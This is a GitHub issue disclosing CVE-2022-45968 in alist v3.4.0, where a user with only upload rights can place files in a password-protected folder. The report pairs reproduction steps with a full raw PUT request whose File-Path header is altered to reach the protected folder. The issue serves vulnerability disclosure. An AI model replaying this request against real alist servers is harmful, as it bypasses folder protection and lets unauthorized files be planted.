CVE-2022-45968: Upload files to the directory with password Vulnerability（bypass） · Issue #2444 · alist-org/alist

Please make sure of the following things

• I have read the documentation.
• I’m sure there are no duplicate issues or discussions.
• I’m sure it’s due to alist and not something else(such as Dependencies or Operational).
• I’m sure I’m using the latest version

Alist Version / Alist 版本

v3.4.0

Driver used / 使用的存储驱动

Local

Describe the bug / 问题描述

• A user with only file upload permission can upload any file to any folder (even a password protected one)

Reproduction：

• Login as a user who only have the right to upload file

• You can see that the /testPasswd folder is password protected

• Go to another folder /test (not protected by password), click on file upload to select the uploaded file and grab the package


• Modify the File-Path in the packet to the specified directory (take /testPasswd as an example) and send the packet

• Enter the password into the folder to find the file uploaded successfully

Reproduction / 复现链接

Package：

PUT /api/fs/put HTTP/1.1
Host: 192.168.31.148:52000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.31.148:52000/test
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJleHAiOjE2NjkyNTkxMjksIm5iZiI6MTY2OTA4NjMyOSwiaWF0IjoxNjY5MDg2MzI5fQ.h3RncP5nufF43YURW74yQJYbWhnhIO5SqjTFl7UUXk4
Content-Type: application/octet-stream
File-Path: %2ftestPasswd%2fYZ68QYZdPcaXKdgE3
As-Task: false
Content-Length: 55875
Origin: http://192.168.31.148:52000
Connection: close

�PNG
�

Logs / 日志

No response